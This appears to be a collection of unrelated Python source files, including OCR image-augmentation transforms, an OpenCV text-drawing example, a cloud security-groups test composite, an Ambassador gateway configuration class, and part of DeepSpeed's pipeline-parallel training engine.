self.process_datasets = process_datasets or []
paper_phase = [
augraphy.PaperFactory(texture_path='augraphy/paper_textures/', p=1.),
augraphy.BrightnessTexturize(range=(0.8, 1.), deviation=0.05, p=0.5),
]
post_phase = [
augraphy.BookBinding(radius_range=(1, 10), curve_intensity_range=(0, 20), p=0.25),
augraphy.Brightness(range=(0.5, 1.), p=0.25),
augraphy.Gamma(range=(0.3, 1.8), p=0.25),
augraphy.LightingGradient(p=0.25),
]
self.pipeline = augraphy.AugraphyPipeline(ink_phase=[], paper_phase=paper_phase, post_phase=post_phase)
self.p = p
def __call__(self, inputs):
if not isinstance(inputs, (tuple, list)):
return inputs
image, dataset = inputs
if dataset not in self.process_datasets or random.random() < self.p:
return image
np_image = np.array(image)
np_image = self.mask_background(np_image)
if np_image.shape[0] >= 30 and np_image.shape[1] >= 30:
try:
np_image = self.pipeline.augment(np_image)['output']
except Exception as e:
logger.info(e)
image = Image.fromarray(np_image)
return image
@staticmethod
def mask_background(image):
original_image = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
image = cv2.bitwise_not(image)
kernel = np.ones((15, 15), np.uint8)
image = cv2.dilate(image, kernel, iterations=2)
gray_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
image = gray_image & image
original_image[np.where(image == 0)] = 0
return original_image
class NumpyAugmentation(object):
def __call__(self, image):
np_image = np.array(image)
np_image = self.forward(np_image)
return Image.fromarray(np_image)
def forward(self, np_image):
raise NotImplementedError
class ResizePad(NumpyAugmentation):
def __init__(self, width, height):
self.width = int(width)
self.height = int(height)
self.ratio = int(width / height)
def forward(self, img):
h, w, _ = img.shape
ratio = w / h
if ratio < self.ratio:
padding = np.zeros((h, self.ratio * h - w, 3), dtype=np.uint8)
img = cv2.hconcat([img, padding])
elif ratio > self.ratio:
padding = np.zeros((w // self.ratio - h, w, 3), dtype=np.uint8)
img = cv2.vconcat([img, padding])
img = cv2.resize(img, (self.width, self.height))
return img.astype(np.uint8)
class WeightedRandomChoice:
def __init__(self, trans, weights=None):
self.trans = trans
if not weights:
self.weights = [1] * len(trans)
else:
assert len(trans) == len(weights)
self.weights = weights
def __call__(self, img):
t = random.choices(self.trans, weights=self.weights, k=1)[0]
try:
tfm_img = t(img)
except Exception as e:
logger.warning('Error during data_aug:'+str(e))
return img
return tfm_img
def __repr__(self):
format_string = self.__class__.__name__ + '('
for t in self.transforms:
format_string += '\n'
format_string += ' {0}'.format(t)
format_string += '\n)'
return format_string
class Dilation(torch.nn.Module):
def __init__(self, kernel=3):
super().__init__()
self.kernel=kernel
def forward(self, img):
return img.filter(ImageFilter.MaxFilter(self.kernel))
def __repr__(self):
return self.__class__.__name__ + '(kernel={})'.format(self.kernel)
class Erosion(torch.nn.Module):
def __init__(self, kernel=3):
super().__init__()
self.kernel=kernel
def forward(self, img):
return img.filter(ImageFilter.MinFilter(self.kernel))
def __repr__(self):
return self.__class__.__name__ + '(kernel={})'.format(self.kernel)
class Underline(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, img):
img_np = np.array(img.convert('L'))
black_pixels = np.where(img_np < 50)
try:
y1 = max(black_pixels[0])
x0 = min(black_pixels[1])
x1 = max(black_pixels[1])
except:
return img
for x in range(x0, x1):
for y in range(y1, y1-3, -1):
try:
img.putpixel((x, y), (0, 0, 0))
except:
continue
return img
class KeepOriginal(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, img):
return img
class ToGray(NumpyAugmentation):
def __init__(self):
self.transform = augmentations.transforms.ToGray(always_apply=True)
def forward(self, image):
augmented = self.transform(image=image)
return augmented['image']
class Distort(NumpyAugmentation):
def __init__(self, segment=3):
self.segment = segment
def forward(self, src):
img_h, img_w = src.shape[:2]
cut = img_w // self.segment
thresh = cut // 3
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([np.random.randint(thresh), np.random.randint(thresh)])
dst_pts.append([img_w - np.random.randint(thresh), np.random.randint(thresh)])
dst_pts.append([img_w - np.random.randint(thresh), img_h - np.random.randint(thresh)])
dst_pts.append([np.random.randint(thresh), img_h - np.random.randint(thresh)])
half_thresh = thresh * 0.5
for cut_idx in np.arange(1, self.segment, 1):
src_pts.append([cut * cut_idx, 0])
src_pts.append([cut * cut_idx, img_h])
dst_pts.append([cut * cut_idx + np.random.randint(thresh) - half_thresh,
np.random.randint(thresh) - half_thresh])
dst_pts.append([cut * cut_idx + np.random.randint(thresh) - half_thresh,
img_h + np.random.randint(thresh) - half_thresh])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Stretch(NumpyAugmentation):
def __init__(self, segment=4):
self.segment = segment
def forward(self, src):
img_h, img_w = src.shape[:2]
cut = img_w // self.segment
thresh = cut * 4 // 5
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([0, 0])
dst_pts.append([img_w, 0])
dst_pts.append([img_w, img_h])
dst_pts.append([0, img_h])
half_thresh = thresh * 0.5
for cut_idx in np.arange(1, self.segment, 1):
move = np.random.randint(thresh) - half_thresh
src_pts.append([cut * cut_idx, 0])
src_pts.append([cut * cut_idx, img_h])
dst_pts.append([cut * cut_idx + move, 0])
dst_pts.append([cut * cut_idx + move, img_h])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Perspective(NumpyAugmentation):
def forward(self, src):
img_h, img_w = src.shape[:2]
thresh = img_h // 2
src_pts = list()
dst_pts = list()
src_pts.append([0, 0])
src_pts.append([img_w, 0])
src_pts.append([img_w, img_h])
src_pts.append([0, img_h])
dst_pts.append([0, np.random.randint(thresh)])
dst_pts.append([img_w, np.random.randint(thresh)])
dst_pts.append([img_w, img_h - np.random.randint(thresh)])
dst_pts.append([0, img_h - np.random.randint(thresh)])
trans = WarpMLS(src, src_pts, dst_pts, img_w, img_h)
dst = trans.generate()
return dst
class Blot(NumpyAugmentation):
def __init__(self, max_count=2):
def get_params(count):
return {
'incline': (-10, 10),
'intensivity': (0.5, 0.9),
'transparency': (0.05, 0.3),
'count': count,
}
self.blots = [HandWrittenBlot(params=get_params(count=i+1)) for i in range(max_count)]
def forward(self, image):
blot = self.blots[random.randint(0, len(self.blots) - 1)]
return blot(image)
class PaperColor(NumpyAugmentation):
def __init__(self):
post_phase = [
augraphy.BookBinding(radius_range=(1, 10), curve_intensity_range=(0, 20), p=0.25),
augraphy.Brightness(range=(0.5, 1.), p=0.25),
augraphy.Gamma(range=(0.3, 1.8), p=0.25),
augraphy.LightingGradient(p=0.25),
]
self.pipeline = augraphy.AugraphyPipeline(ink_phase=[], paper_phase=[], post_phase=post_phase)
def forward(self, np_image):
if np_image.shape[0] >= 30 and np_image.shape[1] >= 30:
try:
np_image = self.pipeline.augment(np_image)['output']
except Exception as e:
logger.info(e)
return np_image
# 0: InterpolationMode.NEAREST,
# 2: InterpolationMode.BILINEAR,
# 3: InterpolationMode.BICUBIC,
# 4: InterpolationMode.BOX,
# 5: InterpolationMode.HAMMING,
# 1: InterpolationMode.LANCZOS,
def build_data_aug(size, mode, preprocess_datasets, resnet=False, resizepad=True,
use_additional_augs=False):
if resnet:
norm_tfm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
else:
norm_tfm = transforms.Normalize(0.5, 0.5)
if resizepad:
resize_tfm = ResizePad(size[0], size[1])
else:
resize_tfm = transforms.Resize(size, interpolation=3)
if mode == 'train':
augmentations = [
# transforms.RandomHorizontalFlip(p=1),
transforms.RandomRotation(degrees=(-10, 10), expand=True, fill=0),
transforms.GaussianBlur(3),
Dilation(3),
Erosion(3),
Underline(),
KeepOriginal(),
]
if use_additional_augs:
augmentations.extend([
Distort(),
Stretch(),
Perspective(),
Blot(),
PaperColor(),
])
return transforms.Compose([
Paperize(preprocess_datasets),
ToGray(),
WeightedRandomChoice(augmentations),
resize_tfm,
transforms.ToTensor(),
norm_tfm
])
else:
return transforms.Compose([
Paperize(),
ToGray(),
resize_tfm,
transforms.ToTensor(),
norm_tfm
])
if __name__ == '__main__':
    tfm = ResizePad(384, 96)  # ResizePad takes required width/height; sample values for the demo
img = Image.open('temp.jpg')
tfm(img).save('temp2.jpg')
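    # Hedged usage sketch (illustrative): build the training-time transform; the
    # dataset name 'iam' and the (width, height) size are placeholders.
    # train_tfm = build_data_aug((384, 96), mode='train',
    #                            preprocess_datasets=['iam'],
    #                            use_additional_augs=True)
    # tensor = train_tfm((img, 'iam'))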
|
the-stack_0_6500 | """
Example to show how to draw basic memes with OpenCV
"""
# Import required packages:
import cv2
import numpy as np
import matplotlib.pyplot as plt
def show_with_matplotlib(img, title):
"""Shows an image using matplotlib capabilities"""
# Convert BGR image to RGB:
img_RGB = img[:, :, ::-1]
# Show the image using matplotlib:
plt.imshow(img_RGB)
plt.title(title)
plt.show()
# Dictionary containing some colors:
colors = {'blue': (255, 0, 0), 'green': (0, 255, 0), 'red': (0, 0, 255), 'yellow': (0, 255, 255),
'magenta': (255, 0, 255), 'cyan': (255, 255, 0), 'white': (255, 255, 255), 'black': (0, 0, 0),
'gray': (125, 125, 125), 'rand': np.random.randint(0, high=256, size=(3,)).tolist(),
'dark_gray': (50, 50, 50), 'light_gray': (220, 220, 220)}
# We load the image 'lenna.png':
image = cv2.imread("lenna.png")
# Write some text (up):
cv2.putText(image, 'Hello World', (10, 30), cv2.FONT_HERSHEY_TRIPLEX, 0.8, colors['green'], 1, cv2.LINE_AA)
# Write some text (down):
cv2.putText(image, 'Goodbye World', (10, 200), cv2.FONT_HERSHEY_TRIPLEX, 0.8, colors['red'], 1, cv2.LINE_AA)
# Show image:
show_with_matplotlib(image, 'very basic meme generator')
|
the-stack_0_6501 | """
Copyright 2014 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.networking.networks.composites import _NetworkingAuthComposite
from cloudcafe.networking.networks.extensions.security_groups_api.behaviors \
import SecurityGroupsBehaviors
from cloudcafe.networking.networks.extensions.security_groups_api.client \
import SecurityGroupsClient
from cloudcafe.networking.networks.extensions.security_groups_api.config \
import SecurityGroupsConfig
class SecurityGroupsComposite(object):
networking_auth_composite = _NetworkingAuthComposite
def __init__(self, auth_composite=None):
auth_composite = auth_composite or self.networking_auth_composite()
self.url = auth_composite.networking_url
self.user = auth_composite._auth_user_config
self.config = SecurityGroupsConfig()
self.client = SecurityGroupsClient(**auth_composite.client_args)
self.behaviors = SecurityGroupsBehaviors(
security_groups_client=self.client,
security_groups_config=self.config)
|
the-stack_0_6503 | from typing import Any, ClassVar, Dict, List, Optional, TYPE_CHECKING
from ..constants import Constants
from ..config import Config
from .irresource import IRResource
from .irhttpmapping import IRHTTPMapping
from .irtls import IRAmbassadorTLS
from .irtlscontext import IRTLSContext
from .ircors import IRCORS
from .irretrypolicy import IRRetryPolicy
from .irbuffer import IRBuffer
from .irgzip import IRGzip
from .irfilter import IRFilter
if TYPE_CHECKING:
from .ir import IR
class IRAmbassador (IRResource):
AModTransparentKeys: ClassVar = [
'admin_port',
'auth_enabled',
'circuit_breakers',
'default_label_domain',
'default_labels',
'diag_port',
'diagnostics',
'enable_ipv6',
'enable_ipv4',
'liveness_probe',
'load_balancer',
'readiness_probe',
'resolver',
'server_name',
'service_port',
'statsd',
'use_proxy_proto',
'use_remote_address',
'x_forwarded_proto_redirect',
'xff_num_trusted_hops',
'enable_http10'
]
service_port: int
diag_port: int
# Set up the default probes and such.
default_liveness_probe: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/check_alive",
"rewrite": "/ambassador/v0/check_alive",
}
default_readiness_probe: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/check_ready",
"rewrite": "/ambassador/v0/check_ready",
}
default_diagnostics: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/",
"rewrite": "/ambassador/v0/",
}
def __init__(self, ir: 'IR', aconf: Config,
rkey: str="ir.ambassador",
kind: str="IRAmbassador",
name: str="ir.ambassador",
use_remote_address: bool=True,
**kwargs) -> None:
# print("IRAmbassador __init__ (%s %s %s)" % (kind, name, kwargs))
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
service_port=Constants.SERVICE_PORT_HTTP,
admin_port=Constants.ADMIN_PORT,
diag_port=Constants.DIAG_PORT,
auth_enabled=None,
enable_ipv6=False,
enable_ipv4=True,
liveness_probe={"enabled": True},
readiness_probe={"enabled": True},
diagnostics={"enabled": True},
use_proxy_proto=False,
enable_http10=False,
use_remote_address=use_remote_address,
x_forwarded_proto_redirect=False,
load_balancer=None,
circuit_breakers=None,
xff_num_trusted_hops=0,
server_name="envoy",
**kwargs
)
def setup(self, ir: 'IR', aconf: Config) -> bool:
# We're interested in the 'ambassador' module from the Config, if any...
amod = aconf.get_module("ambassador")
# Is there a TLS module in the Ambassador module?
if amod:
self.sourced_by(amod)
self.referenced_by(amod)
amod_tls = amod.get('tls', None)
if amod_tls:
# XXX What a hack. IRAmbassadorTLS.from_resource() should be able to make
# this painless.
new_args = dict(amod_tls)
new_rkey = new_args.pop('rkey', amod.rkey)
new_kind = new_args.pop('kind', 'Module')
new_name = new_args.pop('name', 'tls-from-ambassador-module')
new_location = new_args.pop('location', amod.location)
# Overwrite any existing TLS module.
ir.tls_module = IRAmbassadorTLS(ir, aconf,
rkey=new_rkey,
kind=new_kind,
name=new_name,
location=new_location,
**new_args)
# ir.logger.debug("IRAmbassador saving TLS module: %s" % ir.tls_module.as_json())
if ir.tls_module:
self.logger.debug("final TLS module: %s" % ir.tls_module.as_json())
# Stash a sane rkey and location for contexts we create.
ctx_rkey = ir.tls_module.get('rkey', self.rkey)
ctx_location = ir.tls_module.get('location', self.location)
# The TLS module 'server' and 'client' blocks are actually a _single_ TLSContext
# to Ambassador.
server = ir.tls_module.pop('server', None)
client = ir.tls_module.pop('client', None)
if server and server.get('enabled', True):
# We have a server half. Excellent.
ctx = IRTLSContext.from_legacy(ir, 'server', ctx_rkey, ctx_location,
cert=server, termination=True, validation_ca=client)
if ctx.is_active():
ir.save_tls_context(ctx)
# Other blocks in the TLS module weren't ever really documented, so I seriously doubt
# that they're a factor... but, weirdly, we have a test for them...
for legacy_name, legacy_ctx in ir.tls_module.as_dict().items():
if (legacy_name.startswith('_') or
(legacy_name == 'name') or
(legacy_name == 'location') or
(legacy_name == 'kind') or
(legacy_name == 'enabled')):
continue
ctx = IRTLSContext.from_legacy(ir, legacy_name, ctx_rkey, ctx_location,
cert=legacy_ctx, termination=False, validation_ca=None)
if ctx.is_active():
ir.save_tls_context(ctx)
# Finally, check TLSContext resources to see if we should enable TLS termination.
for ctx in ir.get_tls_contexts():
if ctx.get('hosts', None):
# This is a termination context
self.logger.debug("TLSContext %s is a termination context, enabling TLS termination" % ctx.name)
self.service_port = Constants.SERVICE_PORT_HTTPS
if ctx.get('ca_cert', None):
# Client-side TLS is enabled.
self.logger.debug("TLSContext %s enables client certs!" % ctx.name)
# After that, check for port definitions, probes, etc., and copy them in
# as we find them.
for key in IRAmbassador.AModTransparentKeys:
if amod and (key in amod):
# Yes. It overrides the default.
self[key] = amod[key]
# If we don't have a default label domain, force it to 'ambassador'.
if not self.get('default_label_domain'):
self.default_label_domain = 'ambassador'
# Likewise, if we have no default labels, force an empty dict (it makes life easier
# on other modules).
if not self.get('default_labels'):
self.default_labels: Dict[str, Any] = {}
# Next up: diag port & services.
diag_port = aconf.module_lookup('ambassador', 'diag_port', Constants.DIAG_PORT)
diag_service = "127.0.0.1:%d" % diag_port
for name, cur, dflt in [
("liveness", self.liveness_probe, IRAmbassador.default_liveness_probe),
("readiness", self.readiness_probe, IRAmbassador.default_readiness_probe),
("diagnostics", self.diagnostics, IRAmbassador.default_diagnostics)
]:
if cur and cur.get("enabled", False):
if not cur.get('prefix', None):
cur['prefix'] = dflt['prefix']
if not cur.get('rewrite', None):
cur['rewrite'] = dflt['rewrite']
if not cur.get('service', None):
cur['service'] = diag_service
if amod and ('enable_grpc_http11_bridge' in amod):
self.grpc_http11_bridge = IRFilter(ir=ir, aconf=aconf,
kind='ir.grpc_http1_bridge',
name='grpc_http1_bridge',
config=dict())
self.grpc_http11_bridge.sourced_by(amod)
ir.save_filter(self.grpc_http11_bridge)
if amod and ('enable_grpc_web' in amod):
self.grpc_web = IRFilter(ir=ir, aconf=aconf, kind='ir.grpc_web', name='grpc_web', config=dict())
self.grpc_web.sourced_by(amod)
ir.save_filter(self.grpc_web)
if amod and ('lua_scripts' in amod):
self.lua_scripts = IRFilter(ir=ir, aconf=aconf, kind='ir.lua_scripts', name='lua_scripts',
config={'inline_code': amod.lua_scripts})
self.lua_scripts.sourced_by(amod)
ir.save_filter(self.lua_scripts)
# Gzip.
if amod and ('gzip' in amod):
self.gzip = IRGzip(ir=ir, aconf=aconf, location=self.location, **amod.gzip)
if self.gzip:
ir.save_filter(self.gzip)
else:
return False
# Buffer.
if amod and ('buffer' in amod):
self.buffer = IRBuffer(ir=ir, aconf=aconf, location=self.location, **amod.buffer)
if self.buffer:
ir.save_filter(self.buffer)
else:
return False
# Finally, default CORS stuff.
if amod and ('cors' in amod):
self.cors = IRCORS(ir=ir, aconf=aconf, location=self.location, **amod.cors)
if self.cors:
self.cors.referenced_by(self)
else:
return False
if amod and ('retry_policy' in amod):
self.retry_policy = IRRetryPolicy(ir=ir, aconf=aconf, location=self.location, **amod.retry_policy)
if self.retry_policy:
self.retry_policy.referenced_by(self)
else:
return False
if self.get('load_balancer', None) is not None:
if not IRHTTPMapping.validate_load_balancer(self['load_balancer']):
self.post_error("Invalid load_balancer specified: {}".format(self['load_balancer']))
return False
if self.get('circuit_breakers', None) is not None:
if not IRHTTPMapping.validate_circuit_breakers(self['circuit_breakers']):
self.post_error("Invalid circuit_breakers specified: {}".format(self['circuit_breakers']))
return False
return True
def add_mappings(self, ir: 'IR', aconf: Config):
for name, cur in [
( "liveness", self.liveness_probe ),
( "readiness", self.readiness_probe ),
( "diagnostics", self.diagnostics )
]:
if cur and cur.get("enabled", False):
name = "internal_%s_probe_mapping" % name
mapping = IRHTTPMapping(ir, aconf, rkey=self.rkey, name=name, location=self.location,
timeout_ms=10000, **cur)
mapping.referenced_by(self)
ir.add_mapping(aconf, mapping)
def get_default_label_domain(self) -> str:
return self.default_label_domain
def get_default_labels(self, domain: Optional[str]=None) -> Optional[List]:
if not domain:
domain = self.get_default_label_domain()
domain_info = self.default_labels.get(domain, {})
self.logger.debug("default_labels info for %s: %s" % (domain, domain_info))
return domain_info.get('defaults')
def get_default_label_prefix(self, domain: Optional[str]=None) -> Optional[List]:
if not domain:
domain = self.get_default_label_domain()
domain_info = self.default_labels.get(domain, {})
return domain_info.get('label_prefix')
|
the-stack_0_6505 | # Copyright 2019 The Microsoft DeepSpeed Team
import time
import logging
import copy
import os
from types import MethodType
from numpy import prod
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
from deepspeed.utils.logging import logger
from deepspeed.utils.timer import SynchronizedWallClockTimer, ThroughputTimer
from ..engine import DeepSpeedEngine, MEMORY_OPT_ALLREDUCE_SIZE
from ..utils import PartitionedTensor, ensure_directory_exists
from ..dataloader import RepeatingLoader
from .module import PipelineModule, PipelineError, TiedLayerSpec
from . import p2p
from . import schedule
TARGET_ID = -2
LOG_STAGE = -2
DATA_PARALLEL_ID = -2
def is_even(number):
return number % 2 == 0
mem_alloced = 0
mem_cached = 0
def _tensor_bytes(tensor):
return tensor.numel() * tensor.element_size()
class PipelineEngine(DeepSpeedEngine):
""" A training engine hybrid pipeline, data, and model parallel training.
This engine is created by ``deepspeed.initialize()`` when a :class:`PipelineModule`
is provided.
"""
def __init__(self, *super_args, **super_kwargs):
super().__init__(*super_args, **super_kwargs)
assert isinstance(self.module, PipelineModule), "model must base PipelineModule"
assert self.zero_optimization_stage() < 2, "ZeRO-2 and ZeRO-3 are incompatible with pipeline parallelism"
# We schedule the all-reduces, so disable it in super().backward()
self.enable_backward_allreduce = False
assert not self.elasticity_enabled(), "Elasticity is not currently supported" \
" with pipeline parallelism."
# pipeline step for logging
self.log_batch_step_id = -1
self.micro_batch_size = self.train_micro_batch_size_per_gpu()
self.micro_batches = self.gradient_accumulation_steps()
# Set Grid and Communication Groups
self.grid = self.module._grid
if self.grid.get_global_rank() == 0:
logger.info(f'CONFIG: micro_batches={self.micro_batches} '
f'micro_batch_size={self.micro_batch_size}')
self.global_rank = self.grid.get_global_rank()
assert self.dp_world_size == self.grid.data_parallel_size
assert self.train_batch_size() == \
self.micro_batch_size * self.micro_batches * self.grid.data_parallel_size
        # Set Stage Info
self.num_stages = self.grid.pipe_parallel_size
self.stage_id = self.grid.get_stage_id()
self.prev_stage = self.stage_id - 1
self.next_stage = self.stage_id + 1
self.data_iterator = None
self.batch_fn = None
self._force_grad_boundary = False
self.batch_timer = ThroughputTimer(batch_size=self.micro_batch_size *
self.micro_batches,
num_workers=self.dp_world_size,
logging_fn=self.tput_log,
monitor_memory=False,
steps_per_output=self.steps_per_print())
# PipelineEngine needs to handle data loading specially due to only the first
        # and last stages loading inputs/labels. We construct a sampler that shards the
        # dataset across the data-parallel ranks (see _build_data_iter below).
if self.training_data:
self._build_data_iter(self.training_data)
self.is_pipe_parallel = self.grid.pipe_parallel_size > 1
self.is_data_parallel = self.grid.data_parallel_size > 1
self.is_model_parallel = self.grid.model_parallel_size > 1
# Partition input/output buffers
self.is_pipe_partitioned = self.is_model_parallel
self.is_grad_partitioned = False
model_parameters = filter(lambda p: p.requires_grad, self.module.parameters())
num_params = sum([p.numel() for p in model_parameters])
unique_params = num_params
# Subtract tied parameters if we don't own them
if self.module.tied_comms:
tied_params = 0
for key, d in self.module.tied_comms.items():
if self.global_rank != min(d['ranks']):
tied_params += sum(p.numel() for p in d['module'].parameters())
unique_params -= tied_params
params_tensor = torch.LongTensor(data=[num_params,
unique_params]).to(self.device)
dist.all_reduce(params_tensor, group=self.grid.get_model_parallel_group())
params_tensor = params_tensor.tolist()
total_params = params_tensor[0]
unique_params = params_tensor[1]
if self.grid.data_parallel_id == 0:
logger.info(f'RANK={self.global_rank} '
f'STAGE={self.stage_id} '
f'LAYERS={self.module._local_stop - self.module._local_start} '
f'[{self.module._local_start}, {self.module._local_stop}) '
f'STAGE_PARAMS={num_params} ({num_params/1e6:0.3f}M) '
f'TOTAL_PARAMS={total_params} ({total_params/1e6:0.3f}M) '
f'UNIQUE_PARAMS={unique_params} ({unique_params/1e6:0.3f}M)')
        # initialize peer-to-peer communication and allreduce groups
if self.is_pipe_parallel:
p2p.init_process_groups(self.grid)
# Pipeline buffers
self.num_pipe_buffers = 0
self.pipe_buffers = {
'inputs' : [], # batch input and received activations
'labels' : [], # labels from batch input
'outputs' : [], # activations
'output_tensors' : [], # tensor object to preserve backward graph
}
self.pipe_recv_buf = None
self.grad_layer = None
self.meta_buffer = None
self.first_output_send = True
self.first_gradient_send = True
#stores the loss for the current micro batch being processed
self.loss = torch.tensor(0.0).to(self.device)
#stores the loss for the entire batch
self.total_loss = None
self.agg_loss = torch.tensor(0.0, requires_grad=False).to(self.device)
self.dp_group_loss = torch.tensor(0.0, requires_grad=False).to(self.device)
if self._config.pipeline['activation_checkpoint_interval'] > 0:
self.module.activation_checkpoint_interval = self._config.pipeline[
'activation_checkpoint_interval']
if self.is_last_stage():
self.loss_model = self.module.loss_fn
# Initialize pipeline communicators. Just send a 0.
if is_even(self.stage_id):
if not self.is_last_stage():
p2p.send(self.loss, self.next_stage)
if not self.is_first_stage():
p2p.recv(self.loss, self.prev_stage)
else:
if not self.is_first_stage():
p2p.recv(self.loss, self.prev_stage)
if not self.is_last_stage():
p2p.send(self.loss, self.next_stage)
# XXX look into timer reporting timing
# Initialize some timers because of early weirdness.
if self.wall_clock_breakdown():
self.timers('forward_microstep').start()
self.timers('forward_microstep').stop()
self.timers('backward_microstep').start()
self.timers('backward_microstep').stop()
self.timers('backward_inner_microstep').start()
self.timers('backward_inner_microstep').stop()
self.timers('backward_allreduce_microstep').start()
self.timers('backward_allreduce_microstep').stop()
self.timers('backward_allreduce').start()
self.timers('backward_allreduce').stop()
self.timers('step_microstep').start()
self.timers('step_microstep').stop()
def _build_data_iter(self, dataset):
sampler = torch.utils.data.distributed.DistributedSampler(
dataset,
num_replicas=self.dp_world_size,
rank=self.mpu.get_data_parallel_rank(),
shuffle=False)
# Build a loader and make it repeating.
pipe_dataloader = self.deepspeed_io(dataset, data_sampler=sampler)
pipe_dataloader = RepeatingLoader(pipe_dataloader)
self.set_dataloader(pipe_dataloader)
def _exec_reduce_tied_grads(self):
# We need to run this first to write to self.averaged_gradients;
# since this class turns `enable_backward_allreduce` off,
# `self.overlapping_partition_gradients_reduce_epilogue()` defined in the DeepSpeedEngine
# never actually runs. I suspect this is because of efficiency problems; get_flat_partition in
# stage2.py might do something expensive; someone will have to look into that later. But
# in the meantime, this fixes ZeRO2 + Pipelining enough to run a demo. Further profiling
# needed to decide if it actually breaks everything.
# (see https://github.com/EleutherAI/gpt-neox/issues/62#issuecomment-761471944)
if self.zero_optimization_partition_gradients():
self.optimizer.overlapping_partition_gradients_reduce_epilogue()
self.module.allreduce_tied_weight_gradients()
def _exec_reduce_grads(self):
self._force_grad_boundary = True
if self.is_data_parallel:
self.buffered_allreduce_fallback(
elements_per_buffer=MEMORY_OPT_ALLREDUCE_SIZE)
self._force_grad_boundary = False
def _reserve_pipe_buffers(self, num_buffers):
"""Ensure that each pipeline buffer has at least ``num_buffers`` slots.
This method only reserves slots and does not allocate tensors.
Args:
num_buffers (int): The number of buffers to reserve.
"""
if self.num_pipe_buffers >= num_buffers:
return
num_added = num_buffers - self.num_pipe_buffers
for key in self.pipe_buffers:
self.pipe_buffers[key].extend([None] * num_added)
self.num_pipe_buffers = num_buffers
def train_batch(self, data_iter=None):
"""Progress the pipeline to train the next batch of data. The engine will ingest
``self.train_batch_size()`` total samples collectively across all workers.
An iterator that over training data should be provided as an argument
unless ``deepspeed.initialize()`` was provided a training set. In that event,
the training data will automatically be read.
.. warning::
A total of ``self.gradient_accumulation_steps()`` entries will be pulled
from ``data_iter`` by each pipeline. There must be sufficient
data left in ``data_iter`` or else a ``StopIteration`` will halt training.
DeepSpeed provides a convenience class :class:`deepspeed.utils.RepeatingLoader`
that wraps data loaders to automatically restart upon a ``StopIteration``.
Args:
data_iter (Iterator, optional): Iterator of training data.
Returns:
The arithmetic mean of the losses computed this batch.
"""
if not torch._C.is_grad_enabled():
raise RuntimeError(
f'train_batch() requires gradients enabled. Use eval_batch() instead.')
if data_iter:
self.set_dataiterator(data_iter)
self.module.train()
self.total_loss = None
# Do the work
self.timers('train_batch').start()
sched = schedule.TrainSchedule(micro_batches=self.micro_batches,
stages=self.num_stages,
stage_id=self.stage_id)
self._exec_schedule(sched)
self.agg_train_loss = self._aggregate_total_loss()
self.timers('train_batch').stop()
if self.global_steps % self.steps_per_print() == 0:
if self.global_rank == 0:
elapsed = self.timers('train_batch').elapsed(reset=True)
iter_time = elapsed / self.steps_per_print()
tput = self.train_batch_size() / iter_time
print(f'steps: {self.global_steps} '
f'loss: {self.agg_train_loss:0.4f} '
f'iter time (s): {iter_time:0.3f} '
f'samples/sec: {tput:0.3f}')
# Tensorboard
if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/train_loss',
self.agg_train_loss.mean().item(),
self.global_samples)]
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
if self.global_steps % self.steps_per_print() == 0:
self.summary_writer.flush()
if self.wall_clock_breakdown(
) and self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'pipe_send_output',
'pipe_send_grad',
'pipe_recv_input',
'pipe_recv_grad'
])
# TODO: should return precisely what loss returned and allow others to be queried?
return self.agg_train_loss
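# A minimal usage sketch (hedged: `engine` is assumed to be an already-initialized
# PipelineEngine and `train_loader` any iterable of batches; the names are placeholders):
#
#   from deepspeed.utils import RepeatingLoader
#   train_iter = iter(RepeatingLoader(train_loader))
#   for step in range(num_steps):
#       loss = engine.train_batch(data_iter=train_iter)
#
# RepeatingLoader restarts the wrapped loader on StopIteration, which avoids the warning
# above about exhausting `data_iter` mid-schedule.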
def eval_batch(self, data_iter):
"""Evaluate the pipeline on a batch of data from ``data_iter``. The
engine will evaluate ``self.train_batch_size()`` total samples
collectively across all workers.
This method is equivalent to:
.. code-block:: python
module.eval()
with torch.no_grad():
output = module(batch)
.. warning::
A total of ``self.gradient_accumulation_steps()`` entries will be pulled
from ``data_iter`` by each pipeline. There must be sufficient
data left in ``data_iter`` or else a ``StopIteration`` will halt training.
DeepSpeed provides a convenience class :class:`deepspeed.utils.RepeatingLoader`
that wraps data loaders to automatically restart upon a ``StopIteration``.
Args:
data_iter (Iterator): Iterator of data to evaluate.
Returns:
The arithmetic mean of the losses computed this batch.
"""
self.module.eval()
self.total_loss = None
# Use the provided data iterator
train_iterator = self.data_iterator
self.set_dataiterator(data_iter)
# Do the work
sched = schedule.InferenceSchedule(micro_batches=self.micro_batches,
stages=self.num_stages,
stage_id=self.stage_id)
with torch.no_grad():
self._exec_schedule(sched)
self.agg_eval_loss = self._aggregate_total_loss()
